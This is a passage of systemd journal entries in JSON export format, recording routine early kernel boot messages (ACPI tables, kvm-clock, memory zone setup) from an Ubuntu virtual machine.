"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 7 disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29;b=e2b08827b5804427b422c10c84f1567e;m=55829d;t=5bd16dd190205;x=d8b4a1c3e4d93a07", "__REALTIME_TIMESTAMP" : "1615280779887109", "__MONOTONIC_TIMESTAMP" : "5603997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/PAT: Configuration [0-7]: WB WC UC- UC WB WP UC- WT " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a;b=e2b08827b5804427b422c10c84f1567e;m=5582b6;t=5bd16dd19021d;x=a40abd55b189474a", "__REALTIME_TIMESTAMP" : "1615280779887133", "__MONOTONIC_TIMESTAMP" : "5604022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "found SMP MP-table at [mem 0x000f6a80-0x000f6a8f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b;b=e2b08827b5804427b422c10c84f1567e;m=5582be;t=5bd16dd190226;x=509ad16951a77cd3", "__REALTIME_TIMESTAMP" : "1615280779887142", "__MONOTONIC_TIMESTAMP" : "5604030", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Scanning 1 areas for low memory corruption" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c;b=e2b08827b5804427b422c10c84f1567e;m=5582ca;t=5bd16dd190231;x=fa904621ba25687f", "__REALTIME_TIMESTAMP" : "1615280779887153", "__MONOTONIC_TIMESTAMP" : "5604042", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using GB pages for direct mapping" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d;b=e2b08827b5804427b422c10c84f1567e;m=5582eb;t=5bd16dd190253;x=189beb4897315588", "__REALTIME_TIMESTAMP" : "1615280779887187", "__MONOTONIC_TIMESTAMP" : "5604075", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c740000, 0x3c740fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e;b=e2b08827b5804427b422c10c84f1567e;m=5582f5;t=5bd16dd19025d;x=e5585ff116a8653d", "__REALTIME_TIMESTAMP" : "1615280779887197", "__MONOTONIC_TIMESTAMP" : "5604085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c741000, 0x3c741fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f;b=e2b08827b5804427b422c10c84f1567e;m=558303;t=5bd16dd19026a;x=d13f73606857f1af", "__REALTIME_TIMESTAMP" : "1615280779887210", "__MONOTONIC_TIMESTAMP" : "5604099", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c742000, 0x3c742fff] PGTABLE" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30;b=e2b08827b5804427b422c10c84f1567e;m=55830c;t=5bd16dd190274;x=261516535cb52e0e", "__REALTIME_TIMESTAMP" : "1615280779887220", "__MONOTONIC_TIMESTAMP" : "5604108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c743000, 0x3c743fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31;b=e2b08827b5804427b422c10c84f1567e;m=558315;t=5bd16dd19027d;x=8216a6812b4e768a", "__REALTIME_TIMESTAMP" : "1615280779887229", "__MONOTONIC_TIMESTAMP" : "5604117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c744000, 0x3c744fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32;b=e2b08827b5804427b422c10c84f1567e;m=55831e;t=5bd16dd190286;x=60eae5c564d793ce", "__REALTIME_TIMESTAMP" : "1615280779887238", "__MONOTONIC_TIMESTAMP" : "5604126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c745000, 0x3c745fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33;b=e2b08827b5804427b422c10c84f1567e;m=558327;t=5bd16dd19028e;x=d9f5ca398cadfe66", "__REALTIME_TIMESTAMP" : "1615280779887246", "__MONOTONIC_TIMESTAMP" : "5604135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "RAMDISK: [mem 0x35a8b000-0x36d3cfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34;b=e2b08827b5804427b422c10c84f1567e;m=558330;t=5bd16dd190297;x=3d2a38af987659e7", "__REALTIME_TIMESTAMP" : "1615280779887255", "__MONOTONIC_TIMESTAMP" : "5604144", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: Early table checksum verification disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35;b=e2b08827b5804427b422c10c84f1567e;m=558339;t=5bd16dd1902a0;x=d7f562e2ee7b8782", "__REALTIME_TIMESTAMP" : "1615280779887264", "__MONOTONIC_TIMESTAMP" : "5604153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDP 0x00000000000F6880 000014 (v00 BOCHS )" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=36;b=e2b08827b5804427b422c10c84f1567e;m=558345;t=5bd16dd1902ad;x=9aa520c7db1dadf7", "__REALTIME_TIMESTAMP" : "1615280779887277", "__MONOTONIC_TIMESTAMP" : "5604165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDT 0x000000007FFE1504 00002C (v01 BOCHS BXPCRSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=37;b=e2b08827b5804427b422c10c84f1567e;m=55834e;t=5bd16dd1902b6;x=61ec46507e358bdf", "__REALTIME_TIMESTAMP" : "1615280779887286", 
"__MONOTONIC_TIMESTAMP" : "5604174", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACP 0x000000007FFE1418 000074 (v01 BOCHS BXPCFACP 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=38;b=e2b08827b5804427b422c10c84f1567e;m=55835b;t=5bd16dd1902c2;x=9365a8a8002a3511", "__REALTIME_TIMESTAMP" : "1615280779887298", "__MONOTONIC_TIMESTAMP" : "5604187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: DSDT 0x000000007FFE0040 0013D8 (v01 BOCHS BXPCDSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=39;b=e2b08827b5804427b422c10c84f1567e;m=558364;t=5bd16dd1902cb;x=964af1c7dae52a2a", "__REALTIME_TIMESTAMP" : "1615280779887307", "__MONOTONIC_TIMESTAMP" : "5604196", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACS 0x000000007FFE0000 000040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3a;b=e2b08827b5804427b422c10c84f1567e;m=55836d;t=5bd16dd1902d4;x=cf945d10e52f8f74", "__REALTIME_TIMESTAMP" : "1615280779887316", "__MONOTONIC_TIMESTAMP" : "5604205", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" 
: "ACPI: APIC 0x000000007FFE148C 000078 (v01 BOCHS BXPCAPIC 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3b;b=e2b08827b5804427b422c10c84f1567e;m=558376;t=5bd16dd1902dd;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887325", "__MONOTONIC_TIMESTAMP" : "5604214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3c;b=e2b08827b5804427b422c10c84f1567e;m=55838f;t=5bd16dd1902f7;x=e9018680f2c50874", "__REALTIME_TIMESTAMP" : "1615280779887351", "__MONOTONIC_TIMESTAMP" : "5604239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "No NUMA configuration found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3d;b=e2b08827b5804427b422c10c84f1567e;m=5583a9;t=5bd16dd190310;x=b35bf5c4d6572fc4", "__REALTIME_TIMESTAMP" : "1615280779887376", "__MONOTONIC_TIMESTAMP" : "5604265", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Faking a node at [mem 0x0000000000000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3e;b=e2b08827b5804427b422c10c84f1567e;m=5583b3;t=5bd16dd19031a;x=818beee0419abbe8", "__REALTIME_TIMESTAMP" : "1615280779887386", "__MONOTONIC_TIMESTAMP" : "5604275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NODE_DATA(0) allocated [mem 0x7ffb1000-0x7ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3f;b=e2b08827b5804427b422c10c84f1567e;m=5583c7;t=5bd16dd19032e;x=51812eea7aa9592c", "__REALTIME_TIMESTAMP" : "1615280779887406", "__MONOTONIC_TIMESTAMP" : "5604295", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: cpu 0, msr 0:7ff30001, primary cpu clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=40;b=e2b08827b5804427b422c10c84f1567e;m=5583d0;t=5bd16dd190338;x=939313d67c299460", "__REALTIME_TIMESTAMP" : "1615280779887416", "__MONOTONIC_TIMESTAMP" : "5604304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: Using msrs 4b564d01 and 4b564d00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=41;b=e2b08827b5804427b422c10c84f1567e;m=5583da;t=5bd16dd190341;x=cf0e2f81d211a7f4", "__REALTIME_TIMESTAMP" : "1615280779887425", "__MONOTONIC_TIMESTAMP" : "5604314", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: using sched offset of 11561140508 cycles" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=42;b=e2b08827b5804427b422c10c84f1567e;m=5583e6;t=5bd16dd19034e;x=d9b58dae827177ce", "__REALTIME_TIMESTAMP" : "1615280779887438", "__MONOTONIC_TIMESTAMP" : "5604326", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=43;b=e2b08827b5804427b422c10c84f1567e;m=5583f0;t=5bd16dd190357;x=c9b43b89a213bb5a", "__REALTIME_TIMESTAMP" : "1615280779887447", "__MONOTONIC_TIMESTAMP" : "5604336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Zone ranges:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=44;b=e2b08827b5804427b422c10c84f1567e;m=5583f9;t=5bd16dd190361;x=416a4da24a7374a1", "__REALTIME_TIMESTAMP" : "1615280779887457", "__MONOTONIC_TIMESTAMP" : "5604345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA [mem 0x0000000000001000-0x0000000000ffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=45;b=e2b08827b5804427b422c10c84f1567e;m=558403;t=5bd16dd19036a;x=662b5e9ad1909f5e", "__REALTIME_TIMESTAMP" : "1615280779887466", "__MONOTONIC_TIMESTAMP" : "5604355", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA32 [mem 0x0000000001000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=46;b=e2b08827b5804427b422c10c84f1567e;m=55840c;t=5bd16dd190374;x=3a39ce413a58fd84", "__REALTIME_TIMESTAMP" : "1615280779887476", "__MONOTONIC_TIMESTAMP" : "5604364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Normal empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=47;b=e2b08827b5804427b422c10c84f1567e;m=558416;t=5bd16dd19037d;x=2500f0e789913fc2", "__REALTIME_TIMESTAMP" : "1615280779887485", "__MONOTONIC_TIMESTAMP" : "5604374", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Device empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=48;b=e2b08827b5804427b422c10c84f1567e;m=55841f;t=5bd16dd190387;x=6fd45817ea8b18ff", "__REALTIME_TIMESTAMP" : "1615280779887495", "__MONOTONIC_TIMESTAMP" : "5604383", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Movable zone start for each node" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=49;b=e2b08827b5804427b422c10c84f1567e;m=558439;t=5bd16dd1903a1;x=ea71b959dd5cf713", "__REALTIME_TIMESTAMP" : "1615280779887521", "__MONOTONIC_TIMESTAMP" : "5604409", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Early memory node ranges" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4a;b=e2b08827b5804427b422c10c84f1567e;m=558444;t=5bd16dd1903ab;x=220b66ff95907466", "__REALTIME_TIMESTAMP" : "1615280779887531", "__MONOTONIC_TIMESTAMP" : "5604420", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000001000-0x000000000009efff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4b;b=e2b08827b5804427b422c10c84f1567e;m=558451;t=5bd16dd1903b9;x=ebaa6321ff01d24f", "__REALTIME_TIMESTAMP" : "1615280779887545", "__MONOTONIC_TIMESTAMP" : "5604433", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000100000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4c;b=e2b08827b5804427b422c10c84f1567e;m=55845b;t=5bd16dd1903c3;x=cecbae49965d8230", "__REALTIME_TIMESTAMP" : "1615280779887555", "__MONOTONIC_TIMESTAMP" : "5604443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Reserved but unavailable: 98 pages" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4d;b=e2b08827b5804427b422c10c84f1567e;m=558465;t=5bd16dd1903cc;x=4ad7a4d8f6cac2ef", "__REALTIME_TIMESTAMP" : "1615280779887564", "__MONOTONIC_TIMESTAMP" : "5604453", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Initmem setup node 0 [mem 0x0000000000001000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4e;b=e2b08827b5804427b422c10c84f1567e;m=55846f;t=5bd16dd1903d6;x=39a566aa9c4d47fe", "__REALTIME_TIMESTAMP" : "1615280779887574", "__MONOTONIC_TIMESTAMP" : "5604463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "On node 0 totalpages: 524154" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4f;b=e2b08827b5804427b422c10c84f1567e;m=55847b;t=5bd16dd1903e3;x=b35787aecf128a45", "__REALTIME_TIMESTAMP" : "1615280779887587", "__MONOTONIC_TIMESTAMP" : "5604475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 64 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=50;b=e2b08827b5804427b422c10c84f1567e;m=558485;t=5bd16dd1903ed;x=774bf1c47c000e10", "__REALTIME_TIMESTAMP" : "1615280779887597", "__MONOTONIC_TIMESTAMP" : "5604485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 
